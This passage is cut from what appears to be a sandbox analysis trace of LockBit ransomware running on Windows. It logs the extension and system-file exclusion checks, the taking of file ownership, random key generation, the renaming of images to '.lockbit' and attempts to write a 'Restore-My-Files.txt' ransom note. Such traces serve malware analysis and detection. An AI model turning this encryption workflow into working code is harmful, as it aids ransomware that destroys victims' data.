returned -1 [0093.188] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0093.188] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0093.188] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0093.189] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0093.189] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0093.189] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0093.189] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0093.189] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0093.189] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0093.189] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.189] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0093.190] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0093.190] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0093.190] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0093.190] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="passport_mask_left.png") returned 1 [0093.190] lstrcmpiW (lpString1="ntldr", lpString2="passport_mask_left.png") returned -1 [0093.190] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="passport_mask_left.png") returned -1 [0093.190] lstrcmpiW (lpString1="bootsect.bak", lpString2="passport_mask_left.png") returned -1 [0093.190] lstrcmpiW (lpString1="autorun.inf", lpString2="passport_mask_left.png") returned -1 [0093.190] lstrcmpiW (lpString1="thumbs.db", lpString2="passport_mask_left.png") returned 1 [0093.190] lstrcmpiW (lpString1="iconcache.db", lpString2="passport_mask_left.png") returned -1 [0093.190] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.190] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png") returned=".png" [0093.190] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0093.190] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0093.190] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0093.190] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0093.190] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0093.190] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0093.190] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0093.190] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0093.190] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0093.190] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0093.191] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0093.191] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0093.191] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0093.191] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0093.191] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0093.191] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0093.191] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0093.191] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0093.191] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0093.191] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0093.191] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0093.191] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0093.191] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0093.191] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0093.191] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0093.191] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0093.191] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0093.191] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0093.191] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png.lockbit") returned 82 [0093.191] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_left.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.194] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.196] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0093.196] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0093.197] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0093.199] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0093.200] RtlFreeAnsiString (AnsiString="\\") [0093.200] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13dc) returned 0x0 [0093.200] malloc (_Size=0x200) returned 0x77d800 [0093.200] NtQueryInformationToken (in: TokenHandle=0x13dc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0093.200] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.200] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.200] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.205] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.205] CloseHandle (hObject=0x13dc) returned 1 [0093.205] free (_Block=0x77d800) [0093.205] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_left.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13dc [0093.206] CreateIoCompletionPort (FileHandle=0x13dc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0093.206] malloc (_Size=0x40068) returned 0x1ff1e60 [0093.206] GetFileSizeEx (in: hFile=0x13dc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4793) returned 1 [0093.206] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.209] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0093.209] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.212] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0093.212] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.222] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.222] malloc (_Size=0xba) returned 0x77d800 [0093.222] NtSetInformationFile (FileHandle=0x13dc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xba, FileInformationClass=0xa) returned 0x0 [0093.222] free (_Block=0x77d800) [0093.222] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.223] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.223] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.223] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727e67fe, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727e67fe, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="passport_mask_right.png", cAlternateFileName="")) returned 1 [0093.223] lstrcmpiW (lpString1=".", lpString2="passport_mask_right.png") returned -1 [0093.223] lstrcmpiW (lpString1="..", lpString2="passport_mask_right.png") returned -1 [0093.223] PathFindExtensionW (pszPath="passport_mask_right.png") returned=".png" [0093.223] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0093.223] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0093.223] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0093.223] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0093.223] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0093.223] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0093.223] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0093.223] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0093.223] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0093.223] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0093.223] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0093.223] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0093.223] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0093.224] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0093.224] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0093.224] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0093.224] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0093.224] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0093.224] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0093.224] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0093.224] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0093.225] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0093.225] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0093.225] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0093.225] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0093.225] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0093.225] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0093.225] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0093.225] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0093.225] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.225] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0093.225] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0093.225] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0093.225] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0093.225] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="passport_mask_right.png") returned 1 [0093.225] lstrcmpiW (lpString1="ntldr", lpString2="passport_mask_right.png") returned -1 [0093.225] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="passport_mask_right.png") returned -1 [0093.225] lstrcmpiW (lpString1="bootsect.bak", lpString2="passport_mask_right.png") returned -1 [0093.225] lstrcmpiW (lpString1="autorun.inf", lpString2="passport_mask_right.png") returned -1 [0093.225] lstrcmpiW (lpString1="thumbs.db", lpString2="passport_mask_right.png") returned 1 [0093.225] lstrcmpiW (lpString1="iconcache.db", lpString2="passport_mask_right.png") returned -1 [0093.225] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.225] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png") returned=".png" [0093.226] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0093.226] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0093.226] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0093.226] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0093.227] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0093.227] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0093.227] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0093.227] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0093.227] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0093.227] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0093.227] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0093.227] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png.lockbit") returned 83 [0093.227] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_right.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.241] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.243] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0093.243] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0093.244] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0093.245] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0093.245] RtlFreeAnsiString (AnsiString="\\") [0093.245] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13d8) returned 0x0 [0093.245] malloc (_Size=0x200) returned 0x77d800 [0093.246] NtQueryInformationToken (in: TokenHandle=0x13d8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0093.246] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.246] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.246] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.247] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.247] CloseHandle (hObject=0x13d8) returned 1 [0093.247] free (_Block=0x77d800) [0093.247] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_right.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13d8 [0093.247] CreateIoCompletionPort (FileHandle=0x13d8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0093.247] malloc (_Size=0x40068) returned 0x3df0008 [0093.247] GetFileSizeEx (in: hFile=0x13d8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4813) returned 1 [0093.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0093.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.253] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0093.253] ReadFile (in: hFile=0x13d8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0093.256] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.256] malloc (_Size=0xbc) returned 0x77d800 [0093.256] NtSetInformationFile (FileHandle=0x13d8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0093.256] free (_Block=0x77d800) [0093.256] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.257] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.257] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.257] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7274e28a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7274e28a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1aaec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Passport_PAL.wmv", cAlternateFileName="")) returned 1 [0093.257] lstrcmpiW (lpString1=".", lpString2="Passport_PAL.wmv") returned -1 [0093.257] lstrcmpiW (lpString1="..", lpString2="Passport_PAL.wmv") returned -1 [0093.257] PathFindExtensionW (pszPath="Passport_PAL.wmv") returned=".wmv" [0093.257] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0093.257] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0093.257] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0093.257] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0093.257] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0093.257] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0093.257] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0093.257] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0093.257] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0093.257] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0093.257] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0093.257] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0093.257] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0093.258] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0093.258] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0093.259] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0093.259] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0093.259] 